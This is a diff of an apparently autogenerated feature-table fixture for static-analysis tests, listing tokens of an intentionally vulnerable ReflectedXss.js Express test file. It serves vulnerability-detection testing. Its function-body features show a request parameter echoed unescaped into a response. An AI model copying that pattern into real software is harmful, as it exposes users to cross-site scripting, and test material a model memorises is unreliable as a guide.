| +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:0 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:0 | this | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:0 | this | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:1 | converter | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:1 | converter | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:1 | converter | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:1 | doc | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:1 | doc | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:1 | doc | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:1 | format | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:1 | format | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:1 | format | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:1 | html | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:1 | html | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:1 | html | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:1 | markdown | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:1 | markdown | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:1 | markdown | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:1 | markdownIt | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:1 | markdownIt | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:1 | markdownIt | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:1 | markdownIt2 | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:1 | markdownIt2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:1 | markdownIt2 | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:1 | markdownIt3 | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:1 | markdownIt3 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:1 | markdownIt3 | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:1 | marked | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:1 | marked | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:1 | marked | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:1 | moreBadStuff | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:1 | moreBadStuff | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:1 | moreBadStuff | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:1 | remark | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:1 | remark | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:1 | remark | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:1 | remark2rehype | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:1 | remark2rehype | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:1 | remark2rehype | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:1 | require | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:1 | require | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:1 | sanitize | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:1 | sanitize | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:1 | sanitize | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:1 | snarkdown | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:1 | snarkdown | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:1 | snarkdown | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:1 | snarkdown2 | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:1 | snarkdown2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:1 | snarkdown2 | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:1 | table | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:1 | table | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:1 | table | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:1 | unified | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:1 | unified | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:1:1:1 | unified | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:5:1:11 | express | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:5:1:11 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:5:1:11 | express | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:5:1:32 | express | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:5:1:32 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:5:1:32 | express | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:5:1:32 | express ... press') | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:5:1:32 | express ... press') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:5:1:32 | express ... press') | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:15:1:21 | require | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:15:1:21 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:15:1:21 | require | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:15:1:32 | exceptional return of require('express') | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:15:1:32 | exceptional return of require('express') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:15:1:32 | exceptional return of require('express') | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:15:1:32 | require('express') | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:15:1:32 | require('express') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:15:1:32 | require('express') | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:23:1:31 | 'express' | CalleeFlexibleAccessPath | require | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:23:1:31 | 'express' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:23:1:31 | 'express' | calleeImports | | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:23:1:31 | 'express' | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:23:1:31 | 'express' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:1:23:1:31 | 'express' | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:3:5:3:7 | app | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:3:5:3:7 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:3:5:3:7 | app | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:3:5:3:19 | app | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:3:5:3:19 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:3:5:3:19 | app | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:3:5:3:19 | app = express() | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:3:5:3:19 | app = express() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:3:5:3:19 | app = express() | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:3:11:3:17 | express | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:3:11:3:17 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:3:11:3:17 | express | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:3:11:3:19 | exceptional return of express() | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:3:11:3:19 | exceptional return of express() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:3:11:3:19 | exceptional return of express() | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:3:11:3:19 | express() | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:3:11:3:19 | express() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:3:11:3:19 | express() | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:1:5:3 | app | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:1:5:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:1:5:3 | app | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:1:5:7 | app.get | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:1:5:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:1:5:7 | app.get | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:1:14:2 | app.get ... \\n }\\n}) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:1:14:2 | app.get ... \\n }\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:1:14:2 | app.get ... \\n }\\n}) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:1:14:2 | exceptional return of app.get ... \\n }\\n}) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:1:14:2 | exceptional return of app.get ... \\n }\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:1:14:2 | exceptional return of app.get ... \\n }\\n}) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:5:5:7 | get | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:5:5:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:5:5:7 | get | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:9:5:19 | '/user/:id' | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:9:5:19 | '/user/:id' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:9:5:19 | '/user/:id' | calleeImports | express | @@ -19557,6 +131853,26 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:9:5:19 | '/user/:id' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:9:5:19 | '/user/:id' | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:9:5:19 | '/user/:id' | receiverName | app | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:22:5:21 | moreBadStuff | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:22:5:21 | moreBadStuff | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:22:5:21 | moreBadStuff | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: req params id moreBadStuff req params res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:22:5:21 | moreBadStuff | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:22:5:21 | moreBadStuff | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:22:5:21 | this | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:22:5:21 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:22:5:21 | this | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: req params id moreBadStuff req params res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:22:5:21 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:22:5:21 | this | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:22:14:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:22:14:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:22:14:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: req params id moreBadStuff req params res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:22:14:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:22:14:1 | 'arguments' object of anonymous function | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:22:14:1 | exceptional return of anonymous function | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:22:14:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:22:14:1 | exceptional return of anonymous function | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: req params id moreBadStuff req params res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:22:14:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:22:14:1 | exceptional return of anonymous function | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:22:14:1 | functio ... ;\\n }\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:22:14:1 | functio ... ;\\n }\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:22:14:1 | functio ... ;\\n }\\n} | calleeImports | express | @@ -19564,6 +131880,102 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:22:14:1 | functio ... ;\\n }\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:22:14:1 | functio ... ;\\n }\\n} | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:22:14:1 | functio ... ;\\n }\\n} | receiverName | app | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:22:14:1 | return of anonymous function | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:22:14:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:22:14:1 | return of anonymous function | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: req params id moreBadStuff req params res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:22:14:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:22:14:1 | return of anonymous function | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:31:5:33 | req | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:31:5:33 | req | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:31:5:33 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:31:5:33 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:31:5:33 | req | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: req params id moreBadStuff req params res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:31:5:33 | req | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: req params id moreBadStuff req params res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:31:5:33 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:31:5:33 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:31:5:33 | req | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:31:5:33 | req | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:36:5:38 | res | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:36:5:38 | res | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:36:5:38 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:5:36:5:38 | res | 